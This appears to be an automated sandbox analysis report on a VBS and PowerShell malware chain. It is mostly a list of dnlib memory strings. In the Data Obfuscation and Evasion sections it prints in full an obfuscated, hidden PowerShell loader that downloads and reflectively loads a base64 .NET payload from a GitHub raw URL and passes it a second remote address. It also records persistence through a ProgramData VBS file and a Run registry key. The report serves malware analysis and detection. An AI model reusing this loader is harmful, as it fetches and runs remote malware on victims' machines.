Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B807000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000003.00000002.2211606771.00007FFD9BC50000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M", "0", "false");
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BA18166 push esp; iretd 3_2_00007FFD9BA1816C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BA17545 push ebx; iretd 3_2_00007FFD9BA1756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BA11520 push eax; ret 3_2_00007FFD9BA1154D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BAE236C push 8B485F92h; iretd 3_2_00007FFD9BAE2371
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BAE23BE push 8B485F92h; iretd 3_2_00007FFD9BAE23C6

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe File created: C:\ProgramData\autopatia.vbs

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\autopatia.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1747
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1558
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3651
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6083
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 | Thread sleep count: 3651 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 | Thread sleep count: 6083 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708 | Thread sleep time: -19369081277395017s >= -30000s
Source: wscript.exe, 00000007.00000003.1861150433.00000142CF135000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885212759.00000142CF53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885296181.00000142CEB81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885405003.00000142CF331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967958264.000002004D5A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967788286.000002004D7AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1941882840.000002004D3A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967867337.000002004D1A1000.00000004.00000020.00020000.00000000.sdmp, autopatia.vbs.4.dr | Binary or memory string: cmd = "cmd /c wevtutil epl ""Microsoft-Windows-Hyper-V-VMMS-Networking"" " & vmmslogFileName
Source: autopatia.vbs.4.dr | Binary or memory string: "$output += ""(Get-VMNetworkAdapter -all)""; " & _
Source: wscript.exe, 00000007.00000003.1861150433.00000142CF135000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885212759.00000142CF53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885296181.00000142CEB81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885405003.00000142CF331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967958264.000002004D5A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967788286.000002004D7AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1941882840.000002004D3A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967867337.000002004D1A1000.00000004.00000020.00020000.00000000.sdmp, autopatia.vbs.4.dr | Binary or memory string: cmd = "cmd /c wevtutil epl System /q:""*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]"" " & vmswitchlogFileName
Source: wscript.exe, 00000007.00000003.1861830222.00000142CF083000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1861339177.00000142CF07D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1942046045.000002004D2ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1942507199.000002004D2F3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" rt></Analy
Source: wscript.exe, 0000000A.00000003.1942507199.000002004D2F3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ntEl*$output += "(Get-VMNetworkAdapter -all)"; GetEpn/M
Source: wscript.exe, 00000007.00000003.1861339177.00000142CF07D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ntEl*$output += "(Get-VMNetworkAdapter -all)"; GetEpn
Source: powershell.exe, 00000003.00000002.2203709649.0000022A9B7D8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 00000007.00000003.1861830222.00000142CF083000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1861339177.00000142CF07D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1942046045.000002004D2ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1942507199.000002004D2F3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iJOpti`cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]" act
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('r1l'+'url = '+'qle'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/nodetecton/nodet'+'e'+'c'+'ton/r'+'efs/heads/'+'m'+'ain/detahnoth-'+'v.tx'+'tqle; r1lbase64co'+'n'+'tent = (new-obj'+'ect syste'+'m.ne'+'t'+'.'+'we'+'bc'+'li'+'ent).dow'+'nload'+'strin'+'g'+'(r'+'1lur'+'l);'+' r1lbin'+'ary'+'c'+'ontent'+' '+'= [syst'+'em.'+'convert]::fr'+'omb'+'ase64str'+'in'+'g(r1lbase64'+'cont'+'en'+'t)'+'; r'+'1l'+'ass'+'emb'+'ly = [ref'+'l'+'ection.a'+'s'+'se'+'mbly]::l'+'oad('+'r1lbina'+'rycont'+'ent); '+'['+'dnlib'+'.io'+'.h'+'ome]'+'::'+'vai(dzktxt.'+'gfcrr/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'c:k'+'sh'+'progr'+'amdatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'reg'+'asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-replace ([char]100+[char]122+[char]107),[char]34 -replace 'ksh',[char]92-creplace ([char]82+[char]49+[char]108),[char]36 -replace'qle',[char]39)| &( ([string]$verbosepreference)[1,3]+'x'-join'')"
